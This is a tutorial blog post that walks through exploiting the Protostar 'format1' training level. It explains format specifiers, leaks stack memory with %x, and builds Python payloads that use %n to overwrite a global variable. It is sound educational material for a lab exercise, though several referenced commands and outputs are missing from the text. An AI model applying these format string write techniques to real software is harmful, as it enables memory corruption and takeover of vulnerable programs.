Format strings are a handy way for programmers to build a string from several variables. They are designed to save the programmer time and make code look much cleaner. Unbeknownst to some programmers, format strings can also be used by an attacker to compromise their entire program. In this guide, we are going to look at how we can use a format string to exploit a running program.
What Is a Format String?
As mentioned above, a format string is a neat way for a programmer to structure a string that they plan to either print or store in a variable. In the C programming language, a format string looks something like this:
printf("We have %d dogs", 2);
and will output something like this:
We have 2 dogs
The secret ingredient in the format string is the format specifier. The format specifier is the %d in the command we just wrote. When the program sees a format specifier, it knows to expect a variable to replace that specifier. In this case, the variable was the integer 2. Here’s another example:
char *person1 = "Bob";
char *person2 = "Alice";
int books = 15;
printf("%s and %s have %d books", person1, person2, books);
Let’s go line by line and walk through exactly what the program does.
On the first two lines, we define two strings, person1 and person2, and assign them the values “Bob” and “Alice”, respectively. On line three, we define an integer variable named books and give it the value 15. Finally, on the last line, we print out a formatted string. In the string, we see two different format specifiers, %s and %d. As you might have guessed, each one expects a different data type. The former expects a string, while the latter expects an integer. There are several other format specifiers as well. These include %x, which prints an integer in hexadecimal, and %c, which expects an individual character.
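If you want to play with these specifiers without compiling any C, Python’s % operator uses the same ones. The snippet below is only a rough analogue of the C example above (it is Python’s own formatting, not printf), but it shows %s, %d, %x and %c doing the same jobs:

```python
person1 = "Bob"
person2 = "Alice"
books = 15

# %s takes a string, %d takes an integer, just like in the C example.
line = "%s and %s have %d books" % (person1, person2, books)
print(line)        # Bob and Alice have 15 books

# %x prints an integer in hexadecimal, %c prints a single character.
print("%x" % 255)  # ff
print("%c" % 65)   # A
```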
Now that we know how to use format strings, it’s time to learn how to misuse them!
Taking Advantage of Vulnerable Functions
While format strings seem to be merely a different programming technique for concatenating variables and strings, this is not actually the case. The examples we looked at above should raise one very important question: What happens when you have a format specifier in a string, but there is no variable included to replace that format specifier? Let’s hop back into the Protostar virtual machine to find out.
If you don’t yet have Protostar installed, check out the installation guide in our first article on exploit development.
Just as before, we will SSH into our virtual machine with the username user and the password user. Once we’re logged in, it would be a good idea to type the following command.
This will take us from our current shell to a much more interactive shell called Bash. It will make our command-line experience much smoother.
Once that is taken care of, we’re going to jump right in and take a look at the format1 level. Let’s move to the same directory as the format1 executable by typing:
Now, before we recklessly fling ourselves at the challenge, let’s take a look at the source code found on Exploit Exercises.
This source code might be a little intimidating for those unfamiliar with C programming, but I promise it’s not that bad.
Going line by line, we first see a global integer named “target” being declared without a value. The fact that this variable is declared globally instead of inside a function is very important. It changes where, in memory, the variable is stored.
Instead of being stored on the stack, the target variable will be stored in the uninitialized data, or BSS, section of the program. This means we won’t be able to simply flood the stack with an ungodly number of characters to alter the value of the target variable like we did with stack overflow vulnerabilities in previous articles.
Continuing to look at the program, we see a function declared with the name “vuln.” I wonder if this is where we will find the format string vulnerability ….
The first thing that happens in the vuln function is a call to the printf function. This call will print the contents of the variable named string. We first see a reference to the string variable on line 8, where it is declared as a parameter of the vuln function. This means that when the vuln function is called, a string is passed as an argument and given the variable name “string” to be used inside the function. Notice that string is handed to printf as the format string itself, with no other arguments after it.
Next, we see an “if” statement. Essentially, the statement is saying “if the variable target holds any value besides zero, print the following string.” From this if statement, we can gather that our objective is to somehow modify the target variable.
Finally, down on line 17, we can see the main function of the program. Inside the main function is a call to the vuln function we just looked at, with the value “argv[1]” passed as an argument. The expression “argv[1]” refers to the first command-line argument given to the program when it is run. This is where we will be placing our exploit once it is finished.
For now, let’s just try to answer the question we posed above: What happens when you have a format specifier with no variable to replace it?
The Odd Truth
We can see from the above source code that whatever string we pass as a command-line argument to the program will be printed on line 10 by the call to the printf function. Knowing that, let’s stop talking about it and see what actually happens if we pass a format specifier as that argument:
Well, that’s … strange. When we pass the %d format specifier, instead of printing “%d” or throwing an error like we might expect, we get some seemingly random integer. Where is that integer coming from? We could fire up GDB, the GNU debugger, and try to dig through the program to find it, but looking at memory in integer form is sort of messy. Maybe there’s a way we can get this number in hexadecimal form.
As we mentioned earlier, there’s another format specifier, %x, that prints a value in hexadecimal. Let’s see what happens if we replace %d with %x as our argument:
Lo and behold, we get a value (highlighted in red above) that looks a lot like a hexadecimal value. Let’s see if we can find this value somewhere in memory with the GDB debugger.
To start GDB and load the format1 program into it, let’s type the following.
Once GDB has started up, we need to set a breakpoint. Looking back at the source code, line 14 seems like a good choice. To set a breakpoint, we type:
break 14
Now we’re all set to run the program. In GDB, you can run a program with command-line arguments by using the run command with the arguments right after it. In this case, we’ll type:
run %x
This will run the program with %x as the argument. Once we run the program, we should hit the breakpoint, as seen in the image below.
When we hit a breakpoint, execution of the program is halted. From here, we can examine individual chunks of memory with the x command. Let’s start by looking at the stack. To do this, we’ll type:
x/32x $esp
The first x is short for “examine.” This command allows us to examine memory, so the name is fitting. The /32 specifies that we want to examine 32 units of memory, which GDB displays as four-byte words by default. The x that follows tells GDB that we want to view this section of memory in hexadecimal format. The last term, $esp, tells the command to start at the address held in the stack pointer, which is the top of the current stack frame. Let’s see what output we get from this command.
Now we can see a ton of data from the stack, but one value should stick out to us: the same hexadecimal value that was printed earlier is sitting on the stack!
We finally have the answer to our question. When a format specifier doesn’t have a corresponding variable to replace it, the program will simply grab the value in memory at the location where it would have expected the corresponding variable to be. When a program improperly lets a user supply a string containing format specifiers as the format string, an attacker gains the ability to read data straight from memory.
While reading data we shouldn’t be able to read is interesting, writing data that we shouldn’t be able to write is way more fun. With this fun comes complication, however, so hold onto your keyboards and get ready.
There is one more format specifier we have yet to talk about: %n. While every other format specifier is focused on reading a particular type of data, %n is focused on writing data. Specifically, %n writes the number of characters printed so far to the address of a variable. The important thing to note here is that the %n format specifier expects the address of a variable, not the variable itself.
Well, wait a minute! If the program we’re looking at will automatically grab a value from the stack for the other format specifiers, will it automatically grab an address to write to for the %n specifier? Absolutely it will.
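To make that idea concrete, here is a toy model of the behavior in Python. It is a deliberately simplified simulation, not how libc actually implements printf: the function name toy_printf, the stack values and the address 0x08041234 are all made up for illustration. Each %x consumes the next word on a pretend stack, and %n treats the next word as an address and writes the number of characters printed so far to it.

```python
import re

def toy_printf(fmt, stack, memory):
    """Toy model: every specifier consumes the next word on `stack`."""
    out = []
    printed = 0    # characters emitted so far
    next_arg = 0   # index of the next stack word to consume
    for token in re.findall(r"%[xdn]|.", fmt, flags=re.S):
        if token in ("%x", "%d"):
            word = stack[next_arg]
            next_arg += 1
            text = format(word, "x") if token == "%x" else str(word)
        elif token == "%n":
            # The next stack word is used as an address to write to.
            address = stack[next_arg]
            next_arg += 1
            memory[address] = printed
            text = ""
        else:
            text = token  # ordinary character, copied as-is
        out.append(text)
        printed += len(text)
    return "".join(out)

# Hypothetical stack contents; the last word happens to be an address.
stack = [0x804960c, 0xbffff7a8, 0x08041234]
memory = {0x08041234: 0}

output = toy_printf("%x.%x.%n", stack, memory)
print(output)              # 804960c.bffff7a8.
print(memory[0x08041234])  # 17
```

The two %x specifiers leak the first two stack words, and by the time %n is reached 17 characters have been printed, so 17 lands at the address taken from the third word. That is the whole trick we are about to pull on the target variable.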
In order to overwrite the target variable, we’re going to need to place its address in memory and then set up %n to write to that address. To do that, we first need to know where our original input is on the stack.
To find where the string variable is located, let’s restart the program in GDB. This time, we’re going to type the following command.
Just as before, we will hit the breakpoint, and we can start digging. To find the location of the string, we’ll type the following.
p string
In this command, p is short for print. It prints the value of whatever expression we pass to it; for a string pointer like this one, that means the address it points to along with the string itself. Our output should look something like this:
From this output, we can gather that the string is located at 0xbffff987. If we examine the memory at that location, we will, in fact, find the hexadecimal representation of the four As we typed at the beginning of our input.
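If you are wondering what four As look like in hexadecimal, a couple of lines of Python will tell you. This is just a quick check you can run anywhere, not part of the exploit:

```python
import struct

raw = b"AAAA"

# Each "A" is the byte 0x41, so four of them give 41 41 41 41.
print(raw.hex())  # 41414141

# Read as one little-endian four-byte word, the way x86 stores it.
value = struct.unpack("<I", raw)[0]
print(hex(value))  # 0x41414141
```

So 0x41414141 is the pattern to look for, both in GDB and in the output of our format specifiers.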
Here’s the trick: This memory address (0xbffff987) is higher than the memory address of the data we read using the format specifier. This means that if we provide a string with enough format specifiers, we will continue to climb up the memory addresses until we end up back at the beginning of our string. If we do the math, we can find out just how many format specifiers we would need to do that:
By subtracting the address of the data on the stack from the starting address of the string variable, we can see that the two are 547 bytes apart. By rounding that up to 548 and dividing by four, we can see we will need roughly 137 format specifiers to get back to our original string. This sounds like a job for a Python script.
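The arithmetic is easy to double-check in Python. The string address and the 547-byte distance come from the walkthrough above; the address of the leaked stack data is not quoted in this article, so the value computed below is only inferred from those two numbers.

```python
import math

string_addr = 0xbffff987  # address of our input, from GDB above
distance = 547            # bytes between the leaked word and our input
word_size = 4             # each %x consumes one four-byte word

# Inferred, not quoted in the article: where the leaked word would sit.
stack_data_addr = string_addr - distance
print(hex(stack_data_addr))  # 0xbffff764

# Round up to whole words to get the number of specifiers needed.
specifiers = math.ceil(distance / word_size)
print(specifiers)  # 137
```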
Let’s exit out of GDB and type the following command to return to our home directory.
Short and sweet. Once we’re home, let’s use the Nano text editor to open up a new text document.
Once we’re in Nano, let’s type up a skeleton exploit:
Going through the code, the first line tells the shell that when it tries to execute this file, it should use the Python interpreter. The next two lines import modules that we’ll need for the exploit. The “os” module will allow us to make a system call to run the format1 program. The struct module will come in handy when it comes to writing memory addresses later on.
Line four creates an absolute whale of a string variable named payload. Inside that variable, we will be storing four As along with 137 format specifiers. It’s very important to note the periods that are placed within the string. Depending on how long or short the payload is, the string will sit at a slightly different offset in memory, so the four-byte chunks that the format specifiers read will line up with it differently. We need to make sure that all four of our As land in the same four-byte chunk that a single format specifier reads. When practicing on your own, you’ll just have to play around with the length of the string until you find a combination that works.
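For readers following along without the original listing, here is a minimal sketch of what such a skeleton could look like in Python 3. It is not the exact script described above: it swaps the os system call for subprocess so the payload is passed as a single argument without shell quoting, the binary path is the usual Protostar location and is an assumption, and the placement of the periods is a guess that you will likely have to adjust.

```python
#!/usr/bin/env python3
import os
import subprocess

# Assumed install path of the Protostar binary; adjust if yours differs.
BINARY = "/opt/protostar/bin/format1"

def build_payload(specifier_count):
    # Four As as a recognizable marker, then one "%x." per stack word
    # we want to dump. The periods double as separators and padding;
    # their exact number and position is an assumption.
    return "AAAA." + "%x." * specifier_count

payload = build_payload(137)

if os.path.exists(BINARY):
    # Pass the payload as the program's first command-line argument.
    subprocess.call([BINARY, payload])
else:
    # Not on the Protostar VM: just show what would have been sent.
    print("payload length:", len(payload))
```

Keeping the specifier count as a parameter makes it easy to nudge the number up or down while hunting for the As in the output.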
Once we’re done writing the skeleton script, we can save it and run it. Running our exploit skeleton yields the following output:
Because we supplied 137 format specifiers, we got 137 four-byte chunks of memory. This includes the memory we were looking at in GDB earlier.
Looking at the output, we can see our four As (highlighted in red). We seem to have overestimated how many format specifiers we needed, though. This is most likely because the layout of a program’s memory is slightly different when running in GDB instead of by itself. Editing our exploit so we only supply 132 format specifiers instead of 137 should put us exactly where we want to be:
Perfect. From here we can see the light at the end of the tunnel. The glory of exploitation is almost upon us, but there is one more step.
Step 3: Locating & Overwriting the Target Variable
We need to hop back into GDB one more time to get an important piece of information. We’re going to replace the four As at the beginning of our payload string with the address of the target variable. That way, we can swap the last %x specifier for a %n specifier, which will read the address of target and overwrite the value stored there with the number of characters printed so far. To get the address of target, we must type the following into GDB.
p &target
The & in front of the variable name tells GDB that we want the address of the variable, not the value of the variable itself. Running that command yields the following result:
Now, all we have to do is slap that bad boy into our program and we should be good to go. Our final exploit should look like this:
There were two changes made: First, we added a new variable called “address.” This will hold the address of the target variable. We use the struct.pack function to store the address as raw bytes in the byte order that the format1 program will interpret correctly.
The second change comes when we create the payload variable. Instead of starting the string with four As, we now start with the address variable. We make sure to include the period afterward so that the address aligns with where the format specifiers are reading from. We also print one fewer %x format specifier and instead put a %n format specifier in its place. This ensures that the %n format specifier will read the address we wrote at the beginning of the string and overwrite the data at that address. In this case, that address will (hopefully!) be the address of the target variable.
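Here is a hedged Python 3 sketch of those two changes. As with any reconstruction, treat it as an illustration rather than the exact script: TARGET_ADDR is a made-up placeholder that you must replace with the address GDB printed for &target, the binary path is assumed, and subprocess is used in place of the os system call so the raw address bytes reach the program untouched.

```python
#!/usr/bin/env python3
import os
import struct
import subprocess

BINARY = "/opt/protostar/bin/format1"  # assumed Protostar path
TARGET_ADDR = 0x08041234               # placeholder, NOT the real address

def build_exploit(target_addr, reads_before_write=131):
    # "<I" packs the address as a little-endian unsigned 32-bit value,
    # which is the byte order a 32-bit x86 program expects in memory.
    address = struct.pack("<I", target_addr)
    # 131 %x specifiers walk up the stack; the 132nd slot, where the
    # As used to be read, is now consumed by %n as a write address.
    return address + b"." + b"%x." * reads_before_write + b"%n"

payload = build_exploit(TARGET_ADDR)

if os.path.exists(BINARY):
    subprocess.call([BINARY, payload])
else:
    # Not on the Protostar VM: show the packed address bytes instead.
    print(payload[:4].hex())  # 34120408
```

Note how the packed bytes come out in reverse order compared with how we write the address. One practical caveat: an address containing a zero byte could not be passed this way, since a command-line argument ends at the first zero byte.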
Once we’ve made the necessary changes to the program, let’s see what happens when we run it:
The program confirms that we hit the target variable perfectly and overwrote its data with our own. Sweet victory.
Thank you for reading! Format string exploitation can be a bit of a monster to understand at first, and while these vulnerabilities don’t often appear in the wild anymore, they are great at helping you better understand what is actually going on behind the scenes of a program. Comment below with any questions or contact me via Twitter @xAllegiance.